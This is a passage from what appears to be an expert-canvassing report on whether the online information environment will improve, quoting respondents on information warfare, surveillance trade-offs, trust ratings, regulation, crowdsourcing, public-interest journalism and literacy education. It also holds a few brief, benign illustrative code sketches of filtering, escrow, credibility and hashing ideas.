This has been referred to as the weaponization of public narratives. Social media platforms such as Facebook, Reddit and Twitter appear to be prime battlegrounds. Bots are often employed, and AI is expected to be implemented heavily in the information wars to magnify the speed and impact of messaging.
A **leading internet pioneer who has worked with the FCC, the UN’s International Telecommunication Union (ITU), the General Electric Co. (GE) and other major technology organizations** commented, “The ‘internet-as-weapon’ paradigm has emerged.”
**Dean Willis**, consultant for Softarmor Systems, commented, “Governments and political groups have now discovered the power of targeted misinformation coupled to personalized understanding of the targets. Messages can now be tailored with devastating accuracy. We’re doomed to living in targeted information bubbles.”
An **anonymous survey participant** noted, “Misinformation will play a major role in conflicts between nations and within competing parties within nation states.”
**danah boyd**, principal researcher at Microsoft Research and founder of Data & Society, wrote, “What’s at stake right now around information is epistemological in nature. Furthermore, information is a source of power and thus a source of contemporary warfare.”
**Peter Lunenfeld**, a professor at UCLA, commented, “For the foreseeable future, the economics of networks and the networks of economics are going to privilege the dissemination of unvetted, unverified and often weaponized information. Where there is a capitalistic incentive to provide content to consumers, and those networks of distribution originate in a huge variety of transnational and even extra-national economies and political systems, the ability to ‘control’ veracity will be far outstripped by the capability and willingness to supply any kind of content to any kind of user.”
These experts noted that the public has turned to social media – especially Facebook – to get its “news.” They said the public’s craving for quick reads and tabloid-style sensationalism is what makes social media the field of choice for manipulative narratives, which are often packaged to appear like news headlines. They note that the public’s move away from more-traditional mainstream news outlets, which had some ethical standards, to consumption of social newsfeeds has weakened mainstream media organizations, making them lower-budget operations that have been forced to compete for attention by offering up clickbait headlines of their own.
An **emeritus professor of communication for a U.S. Ivy League university** noted, “We have lost an important social function in the press. It is being replaced by social media, where there are few if any moral or ethical guidelines or constraints on the performance of informational roles.”
A **project leader for a science institute** commented, “We live in an era where most people get their ‘news’ via social media and it is very easy to spread fake news. The existence of clickbait sites make it easy for conspiracy theories to be rapidly spread by people who do not bother to read entire articles, nor look for trusted sources. Given that there is freedom of speech, I wonder how the situation can ever improve. Most users just read the headline, comment and share without digesting the entire article or thinking critically about its content (if they read it at all).”
#### Subtheme: The most-effective tech solutions to misinformation will endanger people’s dwindling privacy options, and they are likely to limit free speech and remove the ability for people to be anonymous online
The rise of new and highly varied voices with differing agendas and motivations might generally be considered to be a good thing. But some of these experts said the recent major successes by misinformation manipulators have created a threatening environment in which many in the public are encouraging platform providers and governments to expand surveillance. Among the technological solutions for “cleaning up” the information environment are those that work to clearly identify entities operating online and employ algorithms to detect misinformation. Some of these experts expect that such systems will act to identify perceived misbehaviors and label, block, filter or remove some online content and even ban some posters from further posting.
An **educator** commented, “Creating ‘a reliable, trusted, unhackable verification system’ would produce a system for filtering and hence *structuring* of content. This will end up being a censored information reality.”
An **eLearning specialist** observed, “Any system deeming itself to have the ability to ‘judge’ information as valid or invalid is inherently biased.” And a **professor and researcher** noted, “In an open society, there is no prior determination of what information is genuine or fake.”
In fact, a share of the respondents predicted that the online information environment will not improve in the next decade because any requirement for authenticated identities would take away the public’s highly valued free-speech rights and allow major powers to control the information environment.
A **distinguished professor emeritus of political science at a U.S. university** wrote, “Misinformation will continue to thrive because of the long (and valuable) tradition of freedom of expression. Censorship will be rejected.” An **anonymous respondent** wrote, “There is always a fight between ‘truth’ and free speech. But because the internet cannot be regulated free speech will continue to dominate, meaning the information environment will not improve.”
But another share of respondents said that is precisely why authenticated identities – which are already operating in some places, including China – *will* become a larger part of information systems. A **professor at a major U.S. university** replied, “Surveillance technologies and financial incentives will generate greater surveillance.” A **retired university professor** predicted, “Increased censorship and mass surveillance will tend to create official ‘truths’ in various parts of the world. In the United States, corporate filtering of information will impose the views of the economic elite.”
The **executive director of a major global privacy advocacy organization** argued removing civil liberties in order to stop misinformation will not be effective, saying, “‘Problematic’ actors will be able to game the devised systems while others will be over-regulated.”
Several other respondents also cited this as a major flaw of this potential remedy. They argued against it for several reasons, including the fact that it enables even broader government and corporate surveillance and control over more of the public.
**Emmanuel Edet**, head of legal services at the National Information Technology Development Agency of Nigeria, observed, “The information environment will improve but at a cost to privacy.”
**James LaRue**, director of the Office for Intellectual Freedom of the American Library Association, commented, “Information systems incentivize getting attention. Lying is a powerful way to do that. To stop that requires high surveillance – which means government oversight which has its own incentives not to tell the truth.”
**Tom Valovic**, contributor to The Technoskeptic magazine and author of “Digital Mythologies,” said encouraging platforms to exercise algorithmic controls is not optimal. He wrote: “Artificial intelligence that will supplant human judgment is being pursued aggressively by entities in the Silicon Valley and elsewhere. Algorithmic solutions to replacing human judgment are subject to hidden bias and will ultimately fail to accomplish this goal. They will only continue the centralization of power in a small number of companies that control the flow of information.”
### Theme 3: The information environment will improve because technology will help label, filter or ban misinformation and thus upgrade the public’s ability to judge the quality and veracity of content
Most of the respondents who gave hopeful answers about the future of truth online said they believe technology will be implemented to improve the information environment. They noted their faith was grounded in history, arguing that humans have always found ways to innovate to overcome problems. Most of these experts do not expect there will be a perfect system – but they expect advances. A number said information platform corporations such as Google and Facebook will begin to efficiently police the environment to embed moral and ethical thinking in the structure of their platforms. They hope this will simultaneously enable the screening of content while still protecting rights such as free speech.
**Larry Diamond**, senior fellow at the Hoover Institution and the Freeman Spogli Institute (FSI) at Stanford University, said, “I am hopeful that the principal digital information platforms will take creative initiatives to privilege more authoritative and credible sources and to call out and demote information sources that appear to be propaganda and manipulation engines, whether human or robotic. In fact, the companies are already beginning to take steps in this direction.”
An **associate professor at a U.S. university** wrote, “I do not see us giving up on seeking truth.” And a **researcher** based in Europe said, “Technologies will appear that solve the trust issues and reward logic.”
**Adam Lella**, senior analyst for marketing insights at comScore Inc., replied, “There have been numerous other industry-related issues in the past (e.g., viewability, invalid traffic detection, cross-platform measurement) that were seemingly impossible to solve, and yet major progress was made in the past few years. If there is a great amount of pressure from the industry to solve this problem (which there is), then methodologies will be developed and progress will be made to help mitigate this issue in the long run. In other words, if there’s a will, there’s way.”
#### Subtheme: Likely tech-based solutions include adjustments to algorithmic filters, browsers, apps and plug-ins and the implementation of “trust ratings”
Many respondents who hope for improvement in the information environment mentioned ways in which new technological solutions might be implemented.
**Bart Knijnenburg**, researcher on decision-making and recommender systems and assistant professor of computer science at Clemson University, said, “Two developments will help improve the information environment: 1) News will move to a subscription model (like music, movies, etc.) and subscription providers will have a vested interest in culling down false narratives; 2) Algorithms that filter news will learn to discern the quality of a news item and not just tailor to ‘virality’ or political leaning.”
**Laurel Felt**, lecturer at the University of Southern California, said, “There will be mechanisms for flagging suspicious content and providers and then apps and plugins for people to see the ‘trust rating’ for a piece of content, an outlet or even an IP address. Perhaps people can even install filters so that, when they’re doing searches, hits that don’t meet a certain trust threshold will not appear on the list.”
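As a rough sketch of the kind of plug-in Felt describes — hypothetical code, with made-up domains and a trust-ratings table that would have to come from some external rating service — a threshold filter over search results might look like this:

```python
# Hypothetical sketch: hide search hits whose source falls below a
# user-chosen trust threshold, using ratings from some external service.
def filter_results(results, trust_ratings, threshold=0.7):
    visible = []
    for hit in results:
        score = trust_ratings.get(hit["domain"], 0.0)  # unknown sources rank lowest
        if score >= threshold:
            visible.append({**hit, "trust": score})
    return visible

# Example with made-up ratings and results:
ratings = {"example-news.org": 0.9, "rumor-mill.example": 0.2}
hits = [{"title": "Budget passes", "domain": "example-news.org"},
        {"title": "Shocking secret", "domain": "rumor-mill.example"}]
print(filter_results(hits, ratings))  # only the higher-trust hit remains
```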
A **longtime U.S. government researcher and administrator in communications and technology sciences** said, “The intelligence, defense and related U.S. agencies are very actively working on this problem and results are promising.”
**Amber Case**, research fellow at Harvard University’s Berkman Klein Center for Internet & Society, suggested withholding ad revenue until veracity has been established. She wrote, “Right now, there is an incentive to spread fake news. It is profitable to do so, profit made by creating an article that causes enough outrage that advertising money will follow. … In order to reduce the spread of fake news, we must deincentivize it financially. If an article bursts into collective consciousness and is later proven to be fake, the sites that control or host that content could refuse to distribute advertising revenue to the entity that created or published it. This would require a system of delayed advertising revenue distribution where ad funds are held until the article is proven as accurate or not. A lot of fake news is created by a few people, and removing their incentive could stop much of the news postings.”
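A minimal sketch of the delayed-revenue mechanism Case outlines — assuming some external verification process eventually labels each article accurate or not, with all names hypothetical — could be as simple as an escrow ledger:

```python
# Hypothetical sketch: hold ad revenue in escrow per article and release it
# only if the article is later verified as accurate.
class AdEscrow:
    def __init__(self):
        self.held = {}     # article id -> funds awaiting verification
        self.payouts = {}  # article id -> funds released to the publisher

    def accrue(self, article_id, amount):
        self.held[article_id] = self.held.get(article_id, 0.0) + amount

    def settle(self, article_id, verified_accurate):
        funds = self.held.pop(article_id, 0.0)
        if verified_accurate:
            self.payouts[article_id] = self.payouts.get(article_id, 0.0) + funds
            return funds
        return 0.0  # revenue withheld from a story shown to be fake

escrow = AdEscrow()
escrow.accrue("story-42", 120.0)
print(escrow.settle("story-42", verified_accurate=False))  # 0.0
```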
**Andrea Matwyshyn**, a professor of law at Northeastern University who researches innovation and law, particularly information security, observed, “Software liability law will finally begin to evolve. Market makers will increasingly incorporate security quality as a factor relevant to corporate valuation. The legal climate for security research will continue to improve, as its connection to national security becomes increasingly obvious. These changes will drive significant corporate and public sector improvements in security during the next decade.”
**Larry Keeley**, founder of innovation consultancy Doblin, predicted technology will be improved but people will remain the same, writing, “Capabilities adapted from both bibliometric analytics and good auditing practices will make this a solvable problem. However, non-certified, compelling-but-untrue information will also proliferate. So the new divide will be between the people who want their information to be real vs. those who simply want it to *feel* important. Remember that quote from Roger Ailes: ‘People don’t want to BE informed, they want to FEEL informed.’ Sigh.”
**Anonymous survey participants also responded:**
- “Filters and algorithms will improve to both verify raw data, separate ‘overlays’ and to correct for a feedback loop.”
- “Semantic technologies will be able to cross-verify statements, much like meta-analysis.”
- “The credibility history of each individual will be used to filter incoming information.”
- “The veracity of information will be linked to how much the source is perceived as trustworthy – we may, for instance, develop a trust index and trust will become more easily verified using artificial-intelligence-driven technologies.”
- “The work being done on things like verifiable identity and information sharing through loose federation will improve things somewhat (but not completely). That is to say, things will become better but not necessarily good.”
- “AI, blockchain, crowdsourcing and other technologies will further enhance our ability to filter and qualify the veracity of information.”
- “There will be new visual cues developed to help news consumers distinguish between trusted news sources and others.”
#### Subtheme: Regulatory remedies could include software liability law, required identities, unbundling of social networks like Facebook
A number of respondents believe there will be policy remedies that move beyond whatever technical innovations emerge in the next decade. They offered a range of suggestions, from regulatory reforms applied to the platforms that aid misinformation merchants to legal penalties applied to wrongdoers. Some think the threat of regulatory reform via government agencies may force the issue of required identities and the abolition of anonymity protections for platform users.
**Sonia Livingstone**, professor of social psychology at the London School of Economics and Political Science, replied, “The ‘wild west’ state of the internet will not be permitted to continue by those with power, as we are already seeing with increased national pressure on providers/companies by a range of means from law and regulation to moral and consumer pressures.”
**Willie Currie**, a longtime expert in global communications diffusion, wrote, “The apparent success of fake news on platforms like Facebook will have to be dealt with on a regulatory basis as it is clear that technically minded people will only look for technical fixes and may have incentives not to look very hard, so self-regulation is unlikely to succeed. The excuse that the scale of posts on social media platforms makes human intervention impossible will not be a defense. Regulatory options may include unbundling social networks like Facebook into smaller entities. Legal options include reversing the notion that providers of content services over the internet are mere conduits without responsibility for the content. These regulatory and legal options may not be politically possible to affect within the U.S., but they are certainly possible in Europe and elsewhere, especially if fake news is shown to have an impact on European elections.”
**Sally Wentworth**, vice president of global policy development at the Internet Society, warned against too much dependence upon information platform providers in shaping solutions to improve the information environment. She wrote: “It’s encouraging to see some of the big platforms beginning to deploy internet solutions to some of the issues around online extremism, violence and fake news. And yet, it feels like as a society, we are outsourcing this function to private entities that exist, ultimately, to make a profit and not necessarily for a social good. How much power are we turning over to them to govern our social discourse? Do we know where that might eventually lead? On the one hand, it’s good that the big players are finally stepping up and taking responsibility. But governments, users and society are being too quick to turn all of the responsibility over to internet platforms. Who holds them accountable for the decisions they make on behalf of all of us? Do we even know what those decisions are?”
A **professor and chair in a department of educational theory, policy and administration** commented, “Some of this work can be done in private markets. Being banned from social media is one obvious one. In terms of criminal law, I think the important thing is to have penalties/regulations be domain-specific. Speech can be regulated in certain venues, but obviously not in all. Federal (and perhaps even international) guidelines would be useful. Without a framework for regulation, I can’t imagine penalties.”
### Theme 4: The information environment will improve, because people will adjust and make things better
Many of those who expect the information environment to improve anticipate that information literacy training and other forms of assistance will help people become more sophisticated consumers. They expect that users will gravitate toward more reliable information – and that knowledge providers will respond in kind.
**Frank Kaufmann**, founder and director of several international projects for peace activism and media and information, commented, “The quality of news will improve, because things always improve.” And **Barry Wellman**, virtual communities expert and co-director of the NetLab Network, said, “Software and people are becoming more sophisticated.”
One hopeful respondent said a change in economic incentives can bring about desired change. **Tom Wolzien**, chairman of The Video Call Center and Wolzien LLC, said, “The market will not clean up the bad material, but will shift focus and economic rewards toward the reliable. Information consumers, fed up with false narratives, will increasingly shift toward more-trusted sources, resulting in revenue flowing toward those more trusted sources and away from the junk. This does not mean that all people will subscribe to either scientific or journalistic method (or both), but they will gravitate toward material the sources and institutions they find trustworthy, and those institutions will, themselves, demand methods of verification beyond those they use today.”
A **retired public official and internet pioneer** predicted, “1) Education for veracity will become an indispensable element of secondary school. 2) Information providers will become legally responsible for their content. 3) A few trusted sources will continue to dominate the internet.”
**Irene Wu**, adjunct professor of communications, culture and technology at Georgetown University, said, “Information will improve because people will learn better how to deal with masses of digital information. Right now, many people naively believe what they read on social media. When the television became popular, people also believed everything on TV was true. It’s how people choose to react and access to information and news that’s important, not the mechanisms that distribute them.”
**Charlie Firestone**, executive director at the Aspen Institute Communications and Society Program, commented, “In the future, tagging, labeling, peer recommendations, new literacies (media, digital) and similar methods will enable people to sift through information better to find and rely on factual information. In addition, there will be a reaction to the prevalence of false information so that people are more willing to act to assure their information will be accurate.”
**Howard Rheingold**, pioneer researcher of virtual communities, longtime professor and author of “Net Smart: How to Thrive Online,” noted, “As I wrote in ‘Net Smart’ in 2012, some combination of education, algorithmic and social systems can help improve the signal-to-noise ratio online – with the caveat that misinformation/disinformation versus verified information is likely to be a continuing arms race. In 2012, Facebook, Google and others had no incentive to pay attention to the problem. After the 2016 election, the issue of fake information has been spotlighted.”
#### Subtheme: Misinformation has always been with us and people have found ways to lessen its impact. The problems will become more manageable as people become more adept at sorting through material
Many respondents agree that misinformation will persist as the online realm expands and more people are connected in more ways. Still, the more hopeful among these experts argue that progress is inevitable as people and organizations find coping mechanisms. They say history validates this. Furthermore, they said technologists will play an important role in helping filter out misinformation and modeling new digital literacy practices for users.
**Mark Bunting**, visiting academic at Oxford Internet Institute, a senior digital strategy and public policy advisor with 16 years of experience at the BBC and as a digital consultant, wrote, “Our information environment has been immeasurably improved by the democratisation of the means of publication since the creation of the web nearly 25 years ago. We are now seeing the downsides of that transformation, with bad actors manipulating the new freedoms for antisocial purposes, but techniques for managing and mitigating those harms will improve, creating potential for freer, but well-governed, information environments in the 2020s.”
**Jonathan Grudin**, principal design researcher at Microsoft, said, “We were in this position before, when printing presses broke the existing system of information management. A new system emerged and I believe we have the motivation and capability to do it again. It will again involve information channeling more than misinformation suppression; contradictory claims have always existed in print, but have been manageable and often healthy.”
**Judith Donath**, fellow at Harvard University’s Berkman Klein Center for Internet & Society and founder of the Sociable Media Group at the MIT Media Lab, wrote, “‘Fake news’ is not new. The Weekly World News had a circulation of over a million for its mostly fictional news stories that are printed and sold in a format closely resembling a newspaper. Many readers recognized it as entertainment, but not all. More subtly, its presence on the newsstand reminded everyone that anything can be printed.”
**Joshua Hatch**, president of the Online News Association, noted, “I’m slightly optimistic because there are more people who care about doing the right thing than there are people who are trying to ruin the system. Things will improve because people – individually and collectively – will make it so.”
Many of these respondents said the leaders and engineers of the major information platform companies will play a significant role. Some said they expect some other systematic and social changes will alter things.
**John Wilbanks**, chief commons officer at Sage Bionetworks, replied, “I’m an optimist, so take this with a grain of salt, but I think as people born into the internet age move into positions of authority they’ll be better able to distill and discern fake news than those of us who remember an age of trusted gatekeepers. They’ll be part of the immune system. It’s not that the environment will get better, it’s that those younger will be better fitted to survive it.”
**Danny Rogers**, founder and CEO of Terbium Labs, replied, “Things always improve. Not monotonically, and not without effort, but fundamentally, I still believe that the efforts to improve the information environment will ultimately outweigh efforts to devolve it.”
**Bryan Alexander**, futurist and president of Bryan Alexander Consulting, replied, “Growing digital literacy and the use of automated systems will tip the balance towards a better information environment.”
A number of these respondents said information platform corporations such as Google and Facebook will begin to efficiently police the environment through various technological enhancements. They expressed faith in the inventiveness of these organizations and suggested the people of these companies will implement technology to embed moral and ethical thinking in the structure and business practices of their platforms, enabling the screening of content while still protecting rights such as free speech.
**Patrick Lambe**, principal consultant at Straits Knowledge, commented, “All largescale human systems are adaptive. When faced with novel predatory phenomena, counter-forces emerge to balance or defeat them. We are at the beginning of a largescale negative impact from the undermining of a social sense of reliable fact. Counter-forces are already emerging. The presence of largescale ‘landlords’ controlling significant sections of the ecosystem (e.g., Google, Facebook) aids in this counter-response.”
A **professor in technology law at a West-Coast-based U.S. university** said, “Intermediaries such as Facebook and Google will develop more-robust systems to reward legitimate producers and punish purveyors of fake news.”
A **longtime director for Google** commented, “Companies like Google and Facebook are investing heavily in coming up with usable solutions. Like email spam, this problem can never entirely be eliminated, but it can be managed.”
**Sandro Hawke**, technical staff at the World Wide Web Consortium, predicted, “Things are going to get worse before they get better, but humans have the basic tools to solve this problem, so chances are good that we will. The biggest risk, as with many things, is that narrow self-interest stops people from effectively collaborating.”
**Anonymous respondents shared these remarks:**
- “Accurate facts are essential, particularly within a democracy, so this will be a high, shared value worthy of investment and government support, as well as private-sector initiatives.”
- “We are only at the beginning of drastic technological and societal changes. We will learn and develop strategies to deal with problems like fake news.”
- “There is a long record of innovation taking place to solve problems. Yes, sometimes innovation leads to abuses, but further innovation tends to solve those problems.”
- “Consumers have risen up in the past to block the bullshit, fake ads, fake investment scams, etc., and they will again with regard to fake news.”
- “As we understand more about digital misinformation we will design better tools, policies and opportunities for collective action.”
- “Now that it is on the agenda, smart researchers and technologists will develop solutions.”
- “The increased awareness of the issue will lead to/force new solutions and regulation that will improve the situation in the long-term even if there are bound to be missteps such as flawed regulation and solutions along the way.”
#### Subtheme: Crowdsourcing will work to highlight verified facts and block those who propagate lies and propaganda. Some also have hopes for distributed ledgers (blockchain)
A number of these experts said solutions such as tagging, flagging or other labeling of questionable content will continue to expand and become more useful in tackling the propagation of misinformation.
**J. Nathan Matias**, a postdoctoral researcher at Princeton University and previously a visiting scholar at MIT’s Center for Civic Media, wrote, “Through ethnography and largescale social experiments, I have been encouraged to see volunteer communities with tens of millions of people work together to successfully manage the risks from inaccurate news.”
A **researcher of online harassment working for a major internet information platform** commented, “If there are nonprofits keeping technology in line, such as an ACLU-esque initiative, to monitor misinformation and then partner with spaces like Facebook to deal with this kind of news spam, then yes, the information environment will improve. We also need to move away from clickbaity-like articles, and not algorithmically rely on popularity but on information.”
An **engineer based in North America** replied, “The future will attach credibility to the source of any information. The more a given source is attributed to ‘fake news,’ the lower it will sit in the credibility tree.”
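As a purely illustrative sketch of the kind of source-credibility scoring these respondents describe — every rule, name and number below is invented, and no real system is being quoted — a “credibility tree” entry might be nudged up or down as fact-check outcomes accumulate:

```
// Hypothetical sketch of a per-source credibility score of the kind respondents describe.
// Scoring rules and constants are invented for illustration, not taken from any real system.
using System;
using System.Collections.Generic;

class SourceCredibility
{
    readonly Dictionary<string, double> scores = new ();

    // Unknown sources start at a neutral 0.5.
    public double Get (string source) => scores.TryGetValue (source, out var s) ? s : 0.5;

    // Each fact-check outcome nudges the source's score toward 1 (held up) or 0 (debunked),
    // with diminishing returns so a single event never dominates.
    public void RecordFactCheck (string source, bool storyHeldUp)
    {
        double s = Get (source);
        double target = storyHeldUp ? 1.0 : 0.0;
        scores[source] = s + 0.1 * (target - s);
    }
}

class Demo
{
    static void Main ()
    {
        var index = new SourceCredibility ();
        index.RecordFactCheck ("example-news.test", storyHeldUp: false);
        index.RecordFactCheck ("example-news.test", storyHeldUp: false);
        Console.WriteLine (index.Get ("example-news.test")); // drifts toward 0 as debunks accumulate
    }
}
```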
**Micah Altman**, director of research for the Program on Information Science at MIT, commented, “Technological advances are creating forces pulling in two directions: It is increasingly easy to create real-looking fake information; and it is increasingly easy to crowdsource the collection and verification of information. In the longer term, I’m optimistic that the second force will dominate – as transaction cost-reduction appears to be relatively in favor of crowds versus concentrated institutions.”
Some predicted that digital distributed ledger technologies, known as blockchain, may provide some answers. A longtime **technology editor and columnist based in Europe** commented, “The blockchain approach used for Bitcoin, etc., could be used to distribute content. DECENT is an early example.” And an **anonymous respondent from Harvard University’s Berkman Klein Center for Internet & Society** said, “They will be cryptographically verified, with concepts.”
A **professor of media and communication based in Europe** said, “Right now, reliable and trusted verification systems are not yet available; they may become technically available in the future but the arms race between corporations and hackers is never ending. Blockchain technology may be an option, but every technological system needs to be built on trust, and as long as there is no globally governed trust system that is open and transparent, there will be no reliable verification systems.”
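To make the mechanism under debate concrete — without taking a side on whether it can work at scale — one deliberately simplified, hypothetical reading of “cryptographically verified” content is that a publisher registers a hash of each article in an append-only log and readers check their copies against it:

```
// Hypothetical sketch: hash-based verification of published content against an append-only log.
// It illustrates the idea the respondents debate; it is not a description of any real system,
// and it omits the distributed/consensus aspects of an actual blockchain.
using System;
using System.Collections.Generic;
using System.Security.Cryptography;
using System.Text;

class ContentLedger
{
    readonly HashSet<string> publishedHashes = new ();

    static string Hash (string content) =>
        Convert.ToHexString (SHA256.HashData (Encoding.UTF8.GetBytes (content)));

    // The publisher registers the exact text it released.
    public void Publish (string content) => publishedHashes.Add (Hash (content));

    // A reader (or platform) can later check that a copy has not been altered.
    public bool Verify (string content) => publishedHashes.Contains (Hash (content));
}

class Demo
{
    static void Main ()
    {
        var ledger = new ContentLedger ();
        ledger.Publish ("Original article text.");
        Console.WriteLine (ledger.Verify ("Original article text."));   // True
        Console.WriteLine (ledger.Verify ("Original article text!!!")); // False: content was altered
    }
}
```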
### Theme 5: Tech can’t win the battle. The public must fund and support the production of objective, accurate information. It must also elevate information literacy to be a primary goal of education
There was common agreement among many respondents – whether they said they expect to see improvements in the information environment in the next decade or not – that the problem of misinformation requires significant attention. A share of these respondents urged action in two areas: A bolstering of the public-serving press and an expansive, comprehensive, ongoing information literacy education effort for people of all ages.
A **sociologist doing research on technology and civic engagement at MIT** said, “Though likely to get worse before it gets better, the 2016-2017 information ecosystem problems represent a watershed moment and call to action for citizens, policymakers, journalists, designers and philanthropists who must work together to address the issues at the heart of misinformation.”
**Michael Zimmer**, associate professor and privacy and information ethics scholar at the University of Wisconsin-Milwaukee, commented, “This is a social problem that cannot be solved via technology.”
#### Subtheme: Funding and support must be directed to the restoration of a well-fortified, ethical and trusted public press
Many respondents noted that while the digital age has amplified countless information sources it has hurt the reach and influence of the traditional news organizations. These are the bedrock institutions much of the public has relied upon for objective, verified, reliable information – information undergirded by ethical standards and a general goal of serving the common good. These respondents said the information environment can’t be improved without more, well-staffed, financially stable, independent news organizations. They believe that material can rise above misinformation and create a base of “common knowledge” the public can share and act on.
**Susan Hares**, a pioneer with the National Science Foundation Network (NSFNET) and longtime internet engineering strategist, now a consultant, said, “Society simply needs to decide that the ‘press’ no longer provides unbiased information, and it must pay for unbiased and verified information.”
**Christopher Jencks**, a professor emeritus at Harvard University, said, “Reducing ‘fake news’ requires a profession whose members share a commitment to getting it right. That, in turn, requires a source of money to pay such professional journalists. Advertising used to provide newspapers with money to pay such people. That money is drying up, and it seems unlikely to be replaced within the next decade.”
**Rich Ling**, professor of media technology at the School of Communication and Information at Nanyang Technological University, said, “We have seen the consequences of fake news in the U.S. presidential election and Brexit. This is a wake-up call to the news industry, policy makers and journalists to refine the system of news production.”
**Maja Vujovic**, senior copywriter for the Comtrade Group, predicted, “The information environment will be increasingly perceived as a public good, making its reliability a universal need. Technological advancements and civil-awareness efforts will yield varied ways to continuously purge misinformation from it, to keep it reasonably reliable.”
An **author and journalist based in North America** said, “I believe this era could spawn a new one – a flight to quality in which time-starved citizens place high value on verified news sources.”
A **professor of law at a major U.S. state university** commented, “Things won’t get better until we realize that accurate news and information are a public good that require not-for-profit leadership and public subsidy.”
**Marc Rotenberg**, president of the Electronic Privacy Information Center, wrote, “The problem with online news is structural: There are too few gatekeepers, and the internet business model does not sustain quality journalism. The reason is simply that advertising revenue has been untethered from news production.”
With precarious funding and shrinking audiences, healthy journalism that serves the common good is losing its voice. **Siva Vaidhyanathan**, professor of media studies and director of the Center for Media and Citizenship at the University of Virginia, wrote, “There are no technological solutions that correct for the dominance of Facebook and Google in our lives. These incumbents are locked into monopoly power over our information ecosystem and as they drain advertising money from all other low-cost commercial media they impoverish the public sphere.”
#### Subtheme: Elevate information literacy: It must become a primary goal at all levels of education
Many of these experts said the flaws in human nature and still-undeveloped norms in the digital age are the key problems that make users susceptible to false, misleading and manipulative online narratives. One potential remedy these respondents suggested is a massive compulsory crusade to educate all in digital-age information literacy. Such an effort, some said, might prepare more people to be wise in what they view/read/believe and possibly even serve to upgrade the overall social norms of information sharing.
**Karen Mossberger**, professor and director of the School of Public Affairs at Arizona State University, wrote, “The spread of fake news is not merely a problem of bots, but part of a larger problem of whether or not people exercise critical thinking and information-literacy skills. Perhaps the surge of fake news in the recent past will serve as a wake-up call to address these aspects of online skills in the media and to address these as fundamental educational competencies in our education system. Online information more generally has an almost limitless diversity of sources, with varied credibility. Technology is driving this issue, but the fix isn’t a technical one alone.”
**Mike DeVito**, graduate researcher at Northwestern University, wrote, “These are not technical problems; they are human problems that technology has simply helped scale, yet we keep attempting purely technological solutions. We can’t machine-learn our way out of this disaster, which is actually a perfect storm of poor civics knowledge and poor information literacy.”
**Miguel Alcaine**, International Telecommunication Union area representative for Central America, commented, “The boundaries between online and offline will continue to blur. We understand online and offline are different modalities of real life. There is and will be a market (public and private providers) for trusted information. There is and will be space for misinformation. The most important action societies can take to protect people is education, information and training.”
An **early internet developer and security consultant** commented, “Fake news is not a product of a flaw in the communications channel and cannot be fixed by a fix to the channel. It is due to a flaw in the human consumers of information and can be repaired only by education of those consumers.”
An **anonymous respondent from Harvard University’s Berkman Klein Center for Internet & Society** noted, “False information – intentionally or inadvertently so – is neither new nor the result of new technologies. It may now be easier to spread to more people more quickly, but the responsibility for sifting facts from fiction has always sat with the person receiving that information and always will.”
An **internet pioneer and rights activist based in the Asia/Pacific region** said, “We as a society are not investing enough in education worldwide. The environment will only improve if both sides of the communication channel are responsible. The reader and the producer of content, both have responsibilities.”
**Deirdre Williams**, retired internet activist, replied, “Human beings are losing their capability to question and to refuse. Young people are growing into a world where those skills are not being taught.”
**Julia Koller**, a learning solutions lead developer, replied, “Information is only as reliable as the people who are receiving it. If readers do not change or improve their ability to seek out and identify reliable information sources, the information environment will not improve.”
**Ella Taylor-Smith**, senior research fellow at the School of Computing at Edinburgh Napier University, noted, “As more people become more educated, especially as digital literacy becomes a popular and respected skill, people will favour (and even produce) better quality information.”
**Constance Kampf**, a researcher in computer science and mathematics, said, “The answer depends on socio-technical design – these trends of misinformation versus verifiable information were already present before the internet, and they are currently being amplified. The state and trends in education and place of critical thinking in curricula across the world will be the place to look to see whether or not the information environment will improve – cyberliteracy relies on basic information literacy, social literacy and technological literacy. For the environment to improve, we need substantial improvements in education systems across the world in relation to critical thinking, social literacy, information literacy, and cyberliteracy (see Laura Gurak’s book ‘Cyberliteracy’).”
**Su Sonia Herring**, an editor and translator, commented, “Misinformation and fake news will exist as long as humans do; they have existed ever since language was invented. Relying on algorithms and automated measures will result in various unwanted consequences. Unless we equip people with media literacy and critical-thinking skills, the spread of misinformation will prevail.”
### Responses from additional key experts regarding the future of the information environment
This section features responses by several of the top analysts who participated in this canvassing. Following this wide-ranging set of comments is a much more expansive set of quotations directly tied to the five primary themes identified in this report.
#### Ignorance breeds frustration and ‘a growing fraction of the population has neither the skills nor the native intelligence to master growing complexity’
**Mike Roberts**, pioneer leader at ICANN and Internet Hall of Fame member, replied, “There are complex forces working both to improve the quality of information on the net, and to corrupt it. I believe the outrage resulting from recent events will, on balance, lead to a net improvement, but viewed with hindsight, the improvement may be viewed as inadequate. The other side of the complexity coin is ignorance. The average man or woman in America today has less knowledge of the underpinnings of his or her daily life than they did 50 or a hundred years ago. There has been a tremendous insertion of complex systems into many aspects of how we live in the decades since World War II, fueled by a tremendous growth in knowledge in general. Even among highly intelligent people, there is a significant growth in personal specialization in order to trim the boundaries of expected expertise to manageable levels. Among educated people, we have learned mechanisms for coping with complexity. We use what we know of statistics and probability to compartment uncertainty. We adopt ‘most likely’ scenarios for events of which we do not have detailed knowledge, and so on. A growing fraction of the population has neither the skills nor the native intelligence to master growing complexity, and in a competitive social environment, obligations to help our fellow humans go unmet. Educated or not, no one wants to be a dummy – all the wrong connotations. So ignorance breeds frustration, which breeds acting out, which breeds antisocial and pathological behavior, such as the disinformation, which was the subject of the survey, and many other undesirable second order effects. Issues of trustable information are certainly important, especially since the technological intelligentsia command a number of tools to combat untrustable info. But the underlying pathology won’t be tamed through technology alone. We need to replace ignorance and frustration with better life opportunities that restore confidence – a tall order and a tough agenda. Is there an immediate nexus between widespread ignorance and corrupted information sources? Yes, of course. In fact, there is a virtuous circle where acquisition of trustable information reduces ignorance, which leads to better use of better information, etc.”
#### The truth of news is murky and multifaceted
